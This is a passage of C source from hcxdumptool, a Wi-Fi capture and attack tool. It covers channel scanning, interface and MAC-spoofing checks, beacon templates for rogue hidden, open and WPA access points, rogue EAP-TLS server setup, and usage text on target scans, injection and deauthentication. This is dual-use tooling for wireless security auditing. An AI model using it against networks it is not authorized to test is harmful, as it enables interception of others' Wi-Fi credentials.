< 1) || ((ptrfscanlist->channel) > 255)) continue; ptrfscanlist++; } ptrfscanlist->frequency = 0; ptrfscanlist->channel = 0; free(fscanlistdup); return; } /*===========================================================================*/ static inline void getscanlist() { static int c; static struct iwreq pwrq; ptrfscanlist = fscanlist; for(c = 2407; c < 2488; c++) { if(ptrfscanlist >= fscanlist +FSCANLIST_MAX) break; memset(&pwrq, 0, sizeof(pwrq)); memcpy(&pwrq.ifr_name, interfacename, IFNAMSIZ); pwrq.u.freq.flags = IW_FREQ_FIXED; pwrq.u.freq.m = c; pwrq.u.freq.e = 6; if(ioctl(fd_socket, SIOCSIWFREQ, &pwrq) < 0) continue; ptrfscanlist->frequency = c; if((ptrfscanlist->frequency >= 2407) && (ptrfscanlist->frequency <= 2474)) ptrfscanlist->channel = (ptrfscanlist->frequency -2407)/5; else if((ptrfscanlist->frequency >= 2481) && (ptrfscanlist->frequency <= 2487)) ptrfscanlist->channel = (ptrfscanlist->frequency -2412)/5; else continue; if(((ptrfscanlist->channel) < 1) || ((ptrfscanlist->channel) > 255)) continue; ptrfscanlist++; } for(c = 5005; c < 5981; c++) { if(ptrfscanlist >= fscanlist +FSCANLIST_MAX) break; memset(&pwrq, 0, sizeof(pwrq)); memcpy(&pwrq.ifr_name, interfacename, IFNAMSIZ); pwrq.u.freq.flags = IW_FREQ_FIXED; pwrq.u.freq.m = c; pwrq.u.freq.e = 6; if(ioctl(fd_socket , SIOCSIWFREQ, &pwrq) < 0) continue; ptrfscanlist->frequency = c; if((ptrfscanlist->frequency >= 5005) && (ptrfscanlist->frequency <= 5980)) ptrfscanlist->channel = (ptrfscanlist->frequency -5000)/5; else continue; if(((ptrfscanlist->channel) < 1) || ((ptrfscanlist->channel) > 255)) continue; ptrfscanlist++; } for(c = 5955; c < 6416; c++) { if(ptrfscanlist >= fscanlist +FSCANLIST_MAX) break; memset(&pwrq, 0, sizeof(pwrq)); memcpy(&pwrq.ifr_name, interfacename, IFNAMSIZ); pwrq.u.freq.flags = IW_FREQ_FIXED; pwrq.u.freq.m = c; pwrq.u.freq.e = 6; if(ioctl(fd_socket , SIOCSIWFREQ, &pwrq) < 0) continue; ptrfscanlist->frequency = c; if((ptrfscanlist->frequency >= 5955) && (ptrfscanlist->frequency <= 6415)) ptrfscanlist->channel = (ptrfscanlist->frequency -5950)/5; else continue; if(((ptrfscanlist->channel) < 1) || ((ptrfscanlist->channel) > 255)) continue; ptrfscanlist++; } ptrfscanlist->frequency = 0; ptrfscanlist->channel = 0; return; } /*===========================================================================*/ static inline void show_channels() { static int c; static int res; static struct iwreq pwrq; static int frequency; static int testchannel; fprintf(stdout, "available channels:\n"); for(c = 0; c < 256; c++) { testchannel = 0; frequency = 0; memset(&pwrq, 0, sizeof(pwrq)); strncpy(pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.freq.e = 0; pwrq.u.freq.flags = IW_FREQ_FIXED; pwrq.u.freq.m = c; res = ioctl(fd_socket, SIOCSIWFREQ, &pwrq); if(res >= 0) { memset(&pwrq, 0, sizeof(pwrq)); strncpy(pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.freq.e = 0; pwrq.u.freq.flags = IW_FREQ_FIXED; res = ioctl(fd_socket, SIOCGIWFREQ, &pwrq); if(res >= 0) { frequency = pwrq.u.freq.m; /* frequency or channel : 0 - 1000 = channel > 1000 = frequency in Hz! */ if(frequency > 100000) frequency /= 100000; if(frequency <= 1000) testchannel = frequency; else if((frequency >= 2407) && (frequency <= 2474)) testchannel = (frequency -2407)/5; else if((frequency >= 2481) && (frequency <= 2487)) testchannel = (frequency -2412)/5; else if((frequency >= 5005) && (frequency <= 5980)) testchannel = (frequency -5000)/5; else if((frequency >= 5955) && (frequency <= 6415)) testchannel = (frequency -5950)/5; if(testchannel > 0) { memset(&pwrq, 0, sizeof(pwrq)); strncpy(pwrq.ifr_name, interfacename, IFNAMSIZ -1); pwrq.u.txpower.value = -1; pwrq.u.txpower.fixed = 1; pwrq.u.txpower.disabled = 0; pwrq.u.txpower.flags = IW_TXPOW_DBM; if(ioctl(fd_socket, SIOCGIWTXPOW, &pwrq) < 0) { if(testchannel == frequency) fprintf(stdout, " %3d\n", testchannel); else fprintf(stdout, " %3d / %4dMHz\n", testchannel, frequency); } else { if(pwrq.u.txpower.value > 0) { if(testchannel == frequency) fprintf(stdout, "%3d (%2d dBm)\n",testchannel, pwrq.u.txpower.value); else fprintf(stdout, "%3d / %4dMHz (%2d dBm)\n",testchannel, frequency, pwrq.u.txpower.value); } } } } } } return; } /*===========================================================================*/ static inline bool get_perm_addr(char *ifname, uint8_t *permaddr, uint8_t *virtaddr, char *drivername) { static int fd_info; static struct iwreq iwr; static struct ifreq ifr; static struct ethtool_perm_addr *epmaddr; static struct ethtool_drvinfo drvinfo; memset(permaddr, 0, 6); memset(virtaddr, 0, 6); if((fd_info = socket(AF_INET, SOCK_STREAM, 0)) == -1) { perror("socket info failed"); return false; } memset(&iwr, 0, sizeof(iwr)); strncpy(iwr.ifr_name, ifname, IFNAMSIZ -1); if(ioctl(fd_info, SIOCGIWNAME, &iwr) < 0) { #ifdef DEBUG fprintf(stdout, "testing %s %s\n", ifname, drivername); perror("not a wireless interface"); #endif close(fd_info); return false; } epmaddr = (struct ethtool_perm_addr *) malloc(sizeof(struct ethtool_perm_addr) +6); if(!epmaddr) { perror("failed to malloc memory for permanent hardware address"); close(fd_info); return false; } memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, ifname, IFNAMSIZ -1); epmaddr->cmd = ETHTOOL_GPERMADDR; epmaddr->size = 6; ifr.ifr_data = (char*)epmaddr; if(ioctl(fd_info, SIOCETHTOOL, &ifr) < 0) { perror("failed to get permanent hardware address, ioctl(SIOCETHTOOL) not supported by driver"); free(epmaddr); close(fd_info); return false; } if(epmaddr->size != 6) { free(epmaddr); close(fd_info); return false; } memcpy(permaddr, epmaddr->data, 6); memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, ifname, IFNAMSIZ -1); drvinfo.cmd = ETHTOOL_GDRVINFO; ifr.ifr_data = (char*)&drvinfo; if(ioctl(fd_info, SIOCETHTOOL, &ifr) < 0) { perror("failed to get driver information, ioctl(SIOCETHTOOL) not supported by driver"); free(epmaddr); close(fd_info); return false; } memcpy(drivername, drvinfo.driver, 32); free(epmaddr); memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, ifname, IFNAMSIZ -1); if(ioctl(fd_info, SIOCGIFHWADDR, &ifr) == 0) memcpy(virtaddr, ifr.ifr_hwaddr.sa_data, 6); close(fd_info); return true; } /*===========================================================================*/ static inline void show_wlaninterfaces() { static int p; static struct ifaddrs *ifaddr = NULL; static struct ifaddrs *ifa = NULL; static uint8_t permaddr[6]; static uint8_t virtaddr[6]; static char drivername[32]; if(getifaddrs(&ifaddr) == -1) perror("failed to get ifaddrs"); else { fprintf(stdout, "wlan interfaces:\n"); for(ifa = ifaddr; ifa != NULL; ifa = ifa->ifa_next) { if((ifa->ifa_addr) && (ifa->ifa_addr->sa_family == AF_PACKET)) { memset(&drivername, 0, 32); if(get_perm_addr(ifa->ifa_name, permaddr, virtaddr, drivername) == true) { for (p = 0; p < 6; p++) fprintf(stdout, "%02x", (permaddr[p])); if(checkmonitorinterface(ifa->ifa_name) == false) fprintf(stdout, " %s (%s)", ifa->ifa_name, drivername); else fprintf(stdout, " %s (%s) warning:probably a virtual monitor interface!", ifa->ifa_name, drivername); if(memcmp(&permaddr, &virtaddr, 6) != 0) { fprintf(stdout, " warning:spoofed MAC "); for (p = 0; p < 6; p++) printf("%02x", (virtaddr[p])); fprintf(stdout, " detected"); } fprintf(stdout, "\n"); } } } freeifaddrs(ifaddr); } return; } /*===========================================================================*/ static inline void make_beacon_tagparams(char *beaconparams) { static const uint8_t reactivebeacondata_templ[] = { /* Tag: Supported Rates 1(B), 2(B), 5.5(B), 11(B), 6, 9, 12, 18, [Mbit/sec] */ 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x0c, 0x12, 0x18, 0x24, /* Tag: DS Parameter set: Current Channel: 1 */ 0x03, 0x01, 0x01, /* Tag: Traffic Indication Map (TIM): DTIM 1 of 0 bitmap */ 0x05, 0x04, 0x01, 0x02, 0x00, 0x00, /* Tag: ERP Information */ 0x2a, 0x01, 0x04, /* Tag: Extended Supported Rates 24, 36, 48, 54, [Mbit/sec] */ 0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, /* Tag: RSN Information WPA1 & WPA2 PSK */ 0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x00, 0x0c, /* Tag: Vendor Specific: Microsoft Corp.: WPA Information Element */ 0xdd, 0x16, 0x00, 0x50, 0xf2, 0x01, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02, /* Tag: Extended Capabilities (8 octets) */ 0x7f, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40 }; #define REACTIVEBEACON_TEMPL_SIZE sizeof(reactivebeacondata_templ) #define REACTIVEBEACON_TEMPL_CHANOFFSET 12 static const uint8_t bcbeacondata_hidden_templ[] = { /* Tag: BC SSID HIDDEN*/ 0x00, 0x00, /* Tag: Supported Rates 1(B), 2(B), 5.5(B), 11(B), 6, 9, 12, 18, [Mbit/sec] */ 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x0c, 0x12, 0x18, 0x24, /* Tag: DS Parameter set: Current Channel: 1 */ 0x03, 0x01, 0x01, /* Tag: Traffic Indication Map (TIM): DTIM 1 of 0 bitmap */ 0x05, 0x04, 0x01, 0x02, 0x00, 0x00, /* Tag: ERP Information */ 0x2a, 0x01, 0x04, /* Tag: Extended Supported Rates 24, 36, 48, 54, [Mbit/sec] */ 0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, /* Tag: RSN Information WPA1 & WPA2 PSK */ 0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x00, 0x0c, /* Tag: Vendor Specific: Microsoft Corp.: WPA Information Element */ 0xdd, 0x16, 0x00, 0x50, 0xf2, 0x01, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02, /* Tag: Extended Capabilities (8 octets) */ 0x7f, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40 }; #define BCBEACON_HIDDEN_TEMPL_SIZE sizeof(bcbeacondata_hidden_templ) #define BCBEACON_HIDDEN_TEMPL_CHANOFFSET 14 static const uint8_t bcbeacondata_open_templ[] = { /* Tag: BC SSID Hotspot*/ 0x00, 0x07, 0x48, 0x6f, 0x74, 0x73, 0x70, 0x6f, 0x74, /* Tag: Supported Rates 1(B), 2(B), 5.5(B), 11(B), 6, 9, 12, 18, [Mbit/sec] */ 0x01, 0x08, 0x82, 0x84, 0x8b, 0x96, 0x0c, 0x12, 0x18, 0x24, /* Tag: DS Parameter set: Current Channel: 1 */ 0x03, 0x01, 0x01, /* Tag: Traffic Indication Map (TIM): DTIM 1 of 0 bitmap */ 0x05, 0x04, 0x01, 0x02, 0x00, 0x00, /* Tag: ERP Information */ 0x2a, 0x01, 0x04, /* Tag: Extended Supported Rates 24, 36, 48, 54, [Mbit/sec] */ 0x32, 0x04, 0x30, 0x48, 0x60, 0x6c, /* Tag: Extended Capabilities (8 octets) */ 0x7f, 0x08, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, /* Tag: WMM/WME element */ 0xdd, 0x18, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x01, 0x00, 0x00, 0x03, 0xa4, 0x00, 0x00, 0x27, 0xa4, 0x00, 0x00, 0x42, 0x43, 0x5e, 0x00, 0x62, 0x32, 0x2f, 0x00 }; #define BCBEACON_OPEN_TEMPL_SIZE sizeof(bcbeacondata_open_templ) #define BCBEACON_OPEN_TEMPL_CHANOFFSET 21 static const uint8_t beacon_ie_wpaentpsk_rsn[] = { /* Tag: RSN Information WPA1 & WPA2 ENT + PSK*/ 0x30, 0x18, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x02, 0x00, 0x00, 0x0f, 0xac, 0x01, 0x00, 0x0f, 0xac, 0x02, 0x00, 0x0c }; #define BEACON_IE_WPAENTPSK_RSN_SIZE sizeof(beacon_ie_wpaentpsk_rsn) static const uint8_t beacon_ie_wpaentpsk_wpa[] = { /* Tag: Vendor Specific: Microsoft Corp.: WPA Information Element */ 0xdd, 0x1a, 0x00, 0x50, 0xf2, 0x01, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02, 0x02, 0x00, 0x00, 0x50, 0xf2, 0x01, 0x00, 0x50, 0xf2, 0x02 }; #define BEACON_IE_WPAENTPSK_WPA_SIZE sizeof(beacon_ie_wpaentpsk_wpa) static const uint8_t beacon_ie_wpaent_rsn[] = { /* Tag: RSN Information WPA1 & WPA2 ENT */ 0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x01, 0x00, 0x0c }; #define BEACON_IE_WPAENT_RSN_SIZE sizeof(beacon_ie_wpaent_rsn) static const uint8_t beacon_ie_wpaent_wpa[] = { /* Tag: Vendor Specific: Microsoft Corp.: WPA Information Element */ 0xdd, 0x16, 0x00, 0x50, 0xf2, 0x01, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x00, 0x00, 0x50, 0xf2, 0x01 }; #define BEACON_IE_WPAENT_WPA_SIZE sizeof(beacon_ie_wpaent_wpa) static uint8_t beaconparamsoctets[BEACONBODY_LEN_MAX +BEACON_IE_WPAENTPSK_RSN_SIZE +BEACON_IE_WPAENTPSK_WPA_SIZE]; static uint8_t beaconparamsoctetswpaent[BEACONBODY_LEN_MAX +BEACON_IE_WPAENT_RSN_SIZE +BEACON_IE_WPAENT_WPA_SIZE]; static size_t beaconparamsoctetslen = 0; static size_t beaconparamsoctetswpaentlen = 0; static ietag_t *ieset[IESETLEN_MAX]; static size_t iesetlen; if(wpaentflag == true) { memcpy(&beaconparamsoctets, &beacon_ie_wpaentpsk_rsn, BEACON_IE_WPAENTPSK_RSN_SIZE); beaconparamsoctetslen += BEACON_IE_WPAENTPSK_RSN_SIZE; memcpy(&beaconparamsoctets[BEACON_IE_WPAENTPSK_RSN_SIZE], &beacon_ie_wpaentpsk_wpa, BEACON_IE_WPAENTPSK_WPA_SIZE); beaconparamsoctetslen += BEACON_IE_WPAENTPSK_WPA_SIZE; } memcpy(&beaconparamsoctetswpaent, &beacon_ie_wpaent_rsn, BEACON_IE_WPAENT_RSN_SIZE); beaconparamsoctetswpaentlen += BEACON_IE_WPAENT_RSN_SIZE; memcpy(&beaconparamsoctetswpaent[BEACON_IE_WPAENT_RSN_SIZE], &beacon_ie_wpaent_wpa, BEACON_IE_WPAENT_WPA_SIZE); beaconparamsoctetswpaentlen += BEACON_IE_WPAENT_WPA_SIZE; if(beaconparams != NULL) { if((hex2bin(beaconparams, &beaconparamsoctets[beaconparamsoctetslen], (strlen(beaconparams) /2)) == false) || (hex2bin(beaconparams, &beaconparamsoctetswpaent[beaconparamsoctetswpaentlen], (strlen(beaconparams) /2)) == false)) { fprintf(stderr, "beacon parameters error can't read hex string\n"); exit(EXIT_FAILURE); } beaconparamsoctetslen += (strlen(beaconparams) /2); beaconparamsoctetswpaentlen += (strlen(beaconparams) /2); } iesetlen = bin2ieset(ieset, beaconparamsoctets, beaconparamsoctetslen); reactivebeacondatalen = merge_ieset2bin(reactivebeacondata, BEACONBODY_LEN_MAX -IETAG_SIZE -ESSID_LEN_MAX, reactivebeacondata_templ, REACTIVEBEACON_TEMPL_SIZE, ieset, iesetlen); reactivebeacondatachanoffset = gettlvoffset_value(TAG_CHAN, reactivebeacondata, reactivebeacondatalen); iesetlen = bin2ieset(ieset, beaconparamsoctetswpaent, beaconparamsoctetswpaentlen); reactivebeaconwpaentdatalen = merge_ieset2bin(reactivebeaconwpaentdata, BEACONBODY_LEN_MAX -IETAG_SIZE -ESSID_LEN_MAX, reactivebeacondata_templ, REACTIVEBEACON_TEMPL_SIZE, ieset, iesetlen); reactivebeaconwpaentdatachanoffset = gettlvoffset_value(TAG_CHAN, reactivebeaconwpaentdata, reactivebeaconwpaentdatalen); bcbeacondatahiddenlen = BCBEACON_HIDDEN_TEMPL_SIZE; memcpy(&bcbeacondatahidden, &bcbeacondata_hidden_templ, bcbeacondatahiddenlen); bcbeacondatahiddenchanoffset = BCBEACON_HIDDEN_TEMPL_CHANOFFSET; bcbeacondataopenlen = BCBEACON_OPEN_TEMPL_SIZE; memcpy(&bcbeacondataopen, &bcbeacondata_open_templ, bcbeacondataopenlen); bcbeacondataopenchanoffset = BCBEACON_OPEN_TEMPL_CHANOFFSET; return; } /*===========================================================================*/ static inline bool processeapreqlist(char *optarglist) { static char *opt_ptr; static char *col_ptr; eapreqlist_t *zeiger; memset(eapreqlist, 0, (EAPREQLIST_MAX *EAPREQLIST_SIZE)); opt_ptr = strtok(optarglist, ","); zeiger = eapreqlist; eapreqentries = 0; while(opt_ptr != NULL) { col_ptr = strchr(opt_ptr, ':'); if(col_ptr == opt_ptr +1) { switch(opt_ptr[0]) { case 'T': case 't': zeiger->mode = EAPREQLIST_MODE_TLS; } opt_ptr = col_ptr +1; col_ptr = strchr(opt_ptr, ':'); } if(col_ptr != NULL) { zeiger->length = (((col_ptr -opt_ptr) /2) -1); switch(col_ptr[1]) { case 0: break; case 'F': case 'f': zeiger->termination = EAP_CODE_FAILURE; break; case 'S': case 's': zeiger->termination = EAP_CODE_SUCCESS; break; case 'I': case 'i': zeiger->termination = EAP_CODE_INITIATE; break; case 'N': case 'n': zeiger->termination = EAP_CODE_FINISH; break; case 'D': case 'd': zeiger->termination = EAPREQLIST_TERM_DEAUTH; break; case 'T': case 't': zeiger->termination = EAPREQLIST_TERM_ENDTLS; break; case '-': zeiger->termination = EAPREQLIST_TERM_NOTERM; break; } } else { zeiger->length = (strlen(opt_ptr) /2) -1; } if(hex2bin(opt_ptr, &zeiger->type, zeiger->length +1) == false) return false; eapreqentries++; zeiger++; if(zeiger >= eapreqlist + (EAPREQLIST_MAX *EAPREQLIST_SIZE)) break; opt_ptr = strtok(NULL, ","); } return true; } /*===========================================================================*/ static inline bool tlsinit() { SSL_load_error_strings(); OpenSSL_add_ssl_algorithms(); if((tlsctx = SSL_CTX_new(SSLv23_server_method())) == NULL) { fprintf(stderr, "OpenSSl can't create SSL context\n"); return false; } if(SSL_CTX_use_certificate_file(tlsctx, eapservercertname, SSL_FILETYPE_PEM) <= 0) { ERR_print_errors_fp(stderr); return false; } if(SSL_CTX_use_PrivateKey_file(tlsctx, eapserverkeyname, SSL_FILETYPE_PEM) <= 0) { ERR_print_errors_fp(stderr); return false; } if((eaptlsctx = (eaptlsctx_t*)malloc(EAPTLSCTX_SIZE)) == NULL) return false; memset(eaptlsctx, 0, EAPTLSCTX_SIZE); SSL_CTX_set_session_cache_mode(tlsctx, SSL_SESS_CACHE_OFF); SSL_CTX_set_ecdh_auto(tlsctx, 1); SSL_CTX_set_verify(tlsctx, (SSL_VERIFY_PEER|SSL_VERIFY_CLIENT_ONCE), eap_tls_clientverify_cb); #if (OPENSSL_VERSION_NUMBER >= 0x10100000L) SSL_CTX_set_min_proto_version(tlsctx, TLS1_VERSION); SSL_CTX_set_max_proto_version(tlsctx, TLS1_2_VERSION); #else SSL_CTX_set_options(tlsctx, SSL_OP_NO_SSLv2); SSL_CTX_set_options(tlsctx, SSL_OP_NO_SSLv3); #endif SSL_CTX_set_quiet_shutdown(tlsctx, 0); return true; } /*===========================================================================*/ static inline bool globalinit() { static int c; static int gpiobasemem = 0; static unsigned long opensslversion; static const char notavailable[] = { "N/A" }; gettimeofday(&tv, NULL); tvold.tv_sec = tv.tv_sec; tvold.tv_usec = tv.tv_usec; tvlast_sec = tv.tv_sec; timestampstart = ((uint64_t)tv.tv_sec *1000000) +tv.tv_usec; timestamp = timestampstart; srand(time(NULL)); sleepled.tv_sec = 0; sleepled.tv_nsec = GPIO_LED_DELAY; sleepled2.tv_sec = 0; sleepled2.tv_nsec = GPIO_LED_DELAY +GPIO_LED_DELAY; fd_socket_mccli = 0; fd_socket_mcsrv = 0; fd_socket_srv = 0; rpirevision = 0; if((gpiobutton > 0) || (gpiostatusled > 0)) { if(gpiobutton == gpiostatusled) { fprintf(stderr, "same value for wpi_button and wpi_statusled is not allowed\n"); return false; } gpiobasemem = getrpirev(); if(gpiobasemem == 0) { fprintf(stderr, "failed to locate GPIO\n"); return false; } if(initgpio(gpiobasemem) == false) { fprintf(stderr, "failed to init GPIO\n"); return false; } if(gpiostatusled > 0) { INP_GPIO(gpiostatusled); OUT_GPIO(gpiostatusled); } if(gpiobutton > 0) { INP_GPIO(gpiobutton); } } if(gpiostatusled > 0) { for (c = 0; c < 5; c++) { GPIO_SET = 1 << gpiostatusled; nanosleep(&sleepled, NULL); GPIO_CLR = 1 << gpiostatusled; nanosleep(&sleepled2, NULL); } } ERR_load_crypto_strings(); OpenSSL_add_all_algorithms(); opensslversion = OpenSSL_version_num(); opensslversionmajor = (opensslversion & 0x10000000L) >> 28; opensslversionminor = (opensslversion & 0x01100000L) >> 20; if((filteraplist = (maclist_t*)calloc((FILTERLIST_MAX +1), MACLIST_SIZE)) == NULL) return false; if((filterclientlist = (maclist_t*)calloc((FILTERLIST_MAX +1), MACLIST_SIZE)) == NULL) return false; if((aplist = (macessidlist_t*)calloc((APLIST_MAX +1), MACESSIDLIST_SIZE)) == NULL) return false; if((rglist = (macessidlist_t*)calloc((RGLIST_MAX +1), MACESSIDLIST_SIZE)) == NULL) return false; rgbeaconptr = rglist; if((rgbeaconlist = (macessidlist_t*)calloc((RGLIST_MAX +1), MACESSIDLIST_SIZE)) == NULL) return false; rgbeaconlistptr = rgbeaconlist; if((ownlist = (ownlist_t*)calloc((OWNLIST_MAX +1), OWNLIST_SIZE)) == NULL) return false; if((pmklist = (pmklist_t*)calloc((PMKLIST_MAX +1), PMKLIST_SIZE)) == NULL) return false; if((pagidlist = (pagidlist_t*)calloc((PAGIDLIST_MAX +1), PAGIDLIST_SIZE)) == NULL) return false; if((scanlist = (scanlist_t*)calloc((SCANLIST_MAX +1), SCANLIST_SIZE)) == NULL) return false; if((eapreqlist = (eapreqlist_t*)calloc((EAPREQLIST_MAX +1), EAPREQLIST_SIZE)) == NULL) return false; myoui_ap = myvendorap[rand() %((MYVENDORAP_SIZE /sizeof(int)))]; mynic_ap = rand() & 0xffffff; myoui_ap &= 0xfcffff; mac_myaphidden[5] = mynic_ap & 0xff; mac_myaphidden[4] = (mynic_ap >> 8) & 0xff; mac_myaphidden[3] = (mynic_ap >> 16) & 0xff; mac_myaphidden[2] = myoui_ap & 0xff; mac_myaphidden[1] = (myoui_ap >> 8) & 0xff; mac_myaphidden[0] = (myoui_ap >> 16) & 0xff; mynic_ap++; mac_myapopen[5] = mynic_ap & 0xff; mac_myapopen[4] = (mynic_ap >> 8) & 0xff; mac_myapopen[3] = (mynic_ap >> 16) & 0xff; mac_myapopen[2] = myoui_ap & 0xff; mac_myapopen[1] = (myoui_ap >> 8) & 0xff; mac_myapopen[0] = (myoui_ap >> 16) & 0xff; mynic_ap++; mac_myap[5] = mynic_ap & 0xff; mac_myap[4] = (mynic_ap >> 8) & 0xff; mac_myap[3] = (mynic_ap >> 16) & 0xff; mac_myap[2] = myoui_ap & 0xff; mac_myap[1] = (myoui_ap >> 8) & 0xff; mac_myap[0] = (myoui_ap >> 16) & 0xff; mynic_ap++; rglist->timestamp = timestampstart; memcpy(rglist->ap, &mac_myap, 6); rglist->essidlen = 4; memcpy(rglist->essid, &myessid, 4); myoui_client = myvendorclient[rand() %((MYVENDORCLIENT_SIZE /sizeof(int)))]; myoui_client &= 0xffffff; mac_myclient[5] = rand() & 0xff; mac_myclient[4] = rand() & 0xff; mac_myclient[3] = rand() & 0xff; mac_myclient[2] = myoui_client & 0xff; mac_myclient[1] = (myoui_client >> 8) &0xff; mac_myclient[0] = (myoui_client >> 16) &0xff; memcpy(&mac_myprclient, &mac_myclient, 6); for(c = 0; c < 32; c++) { myanonce[c] = rand() %0xff; mysnonce[c] = rand() %0xff; } myrc = (rand()%0xfff) +0xf000; myclientsequence = 1; myreactivebeaconsequence = 1; myapsequence = 1; myapsequence = 1; mydeauthenticationsequence = 1; mydisassociationsequence = 1; myclientsequence = 1; mytime = 1; filteraplistentries = 0; filterclientlistentries = 0; nmealen = 0; memset(&nmeatempsentence, 0, NMEA_MAX); memset(&nmeasentence, 0, NMEA_MAX); memcpy(&nmeasentence, ¬available, 3); weakcandidatelen = 8; wantstopflag = false; reloadfilesflag = false; errorcount = 0; radiotaperrorcount = 0; gpserrorcount = 0; incomingcount = 0; outgoingcount = 0; pmkidcount = 0; pmkidroguecount = 0; eapolmp12count = 0; eapolmp12roguecount = 0; eapolmp23count = 0; eapolmp34count = 0; eapolmp34zeroedcount = 0; injectionhit = 0; responsehit = 0; injectioncount = 0; injectionratio = 0; gpscount = 0; bpf.filter = NULL; bpf.len = 0; aktchannel = 0; if(eaptunflag == true) { if(tlsinit() == false) return false; } packetsentflag = false; packetsenttries = 0; packetsentlen = 0; signal(SIGINT, programmende); signal(SIGHUP, reloadfiles); return true; } /*===========================================================================*/ /*===========================================================================*/ __attribute__ ((noreturn)) static inline void version(char *eigenname) { fprintf(stdout, "%s %s (C) %s ZeroBeat\n", eigenname, VERSION_TAG, VERSION_YEAR); exit(EXIT_SUCCESS); } /*---------------------------------------------------------------------------*/ __attribute__ ((noreturn)) static inline void usage(char *eigenname) { fprintf(stdout, "%s %s (C) %s ZeroBeat\n" "usage : %s \n" " press ctrl+c to terminate hcxdumptool\n" " press GPIO button to terminate hcxdumptool\n" " hardware modification is necessary, read more:\n" " https://github.com/ZerBea/hcxdumptool/tree/master/docs\n" " do not set monitor mode by third party tools (iwconfig, iw, airmon-ng)\n" " do not run hcxdumptool on logical (NETLINK) interfaces (monx, wlanxmon, prismx, ...) created by airmon-ng and iw\n" " do not run hcxdumtool on virtual machines or emulators\n" " do not run hcxdumptool in combination with tools (channel hopper), that take access to the interface (except: tshark, wireshark, tcpdump)\n" " do not use tools like machcanger, because hcxdumptool run its own MAC space and will ignore this changes\n" " stop all this services (e.g.: wpa_supplicant.service, NetworkManager.service) that take access to the interface\n" "\n" "short options:\n" "-i : interface (monitor mode will be enabled by hcxdumptool)\n" " it is mandatory that the driver support ioctl() system calls, monitor mode and full packet injection!\n" "-o : output file in pcapng format, filename '-' outputs to stdout, '+' outputs to client\n" " including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP)\n" "-f : frames to save\n" " bitmask:\n" " 0: clear default values\n" " 1: MANAGEMENT frames (default)\n" " 2: EAP and EAPOL frames (default)\n" " 4: IPV4 frames\n" " 8: IPV6 frames\n" " 16: WEP encrypted frames\n" " 32: WPA encrypted frames\n" " 64: vendor defined frames (AWDL)\n" " to clear default values use -f 0 first, followed by desired frame type (e.g. -f 0 -f 4)\n" "-c : set frequency (2437,2462,5600,...) or channel (1,2,3, ...)\n" " default: auto frequency/auto band\n" " maximum entries: 255\n" " 0 - 1000 treated as channel\n" " > 1000 treated as frequency in MHz\n" " on 5GHz and 6Ghz it is recommended to use frequency instead of channel number\n" " because channel numbers are not longer unique\n" " standard 802.11 channels (depend on device, driver and world regulatory domain):\n" " https://en.wikipedia.org/wiki/List_of_WLAN_channels\n" "-s : set predefined scanlist\n" " 0 = auto frequency/auto band (default)\n" " 1 = %s (optimized 2.4GHz)\n" " 2 = %s (standard 2.4 GHz)\n" " 3 = %s (standard 5GHz)\n" " 4 = %s (standard 2.4GHz/5GHz)\n" "-t : stay time on frequency before hopping to the next channel\n" " default %d seconds\n" "-m : set monitor mode by ioctl() system call and quit\n" "-I : show WLAN interfaces and quit\n" "-C : show available device channels and quit\n" " if no frequencies are available, interface is probably in use or doesn't support monitor mode\n" " if additional frequencies are available, firmware, driver and regulatory domain is probably patched\n" "-h : show this help\n" "-v : show version\n" "\n" "long options:\n" "--do_rcascan : show radio channel assignment (scan for target access points)\n" " this can be used to test that ioctl() calls and packet injection is working\n" " if you got no HIT, packet injection is possible not working\n" " also it can be used to get information about the target\n" " and to determine that the target is in range\n" " use this mode to collect data for the filter list\n" " run this mode at least for 2 minutes\n" " to save all received raw packets use option -o\n" " default scanlist: channel 1 ...13\n" "--rcascan_max=digit> : show only n highest ranking lines\n" " default: %d lines\n" "--rcascan_order=digit> : rcascan sorting order:\n" " 0 = sort by PROBERESPONSE count (default)\n" " 1 = sort by BEACON count\n" " 2 = sort by CHANNEL\n" "--do_targetscan= : same as do_rcascan - hide all networks, except target\n" " format: 112233445566, 11:22:33:44:55:66, 11-22-33-44-55-66\n" "--reason_code= : deauthentication reason code\n" " recommended codes:\n" " 1 WLAN_REASON_UNSPECIFIED\n" " 2 WLAN_REASON_PREV_AUTH_NOT_VALID\n" " 4 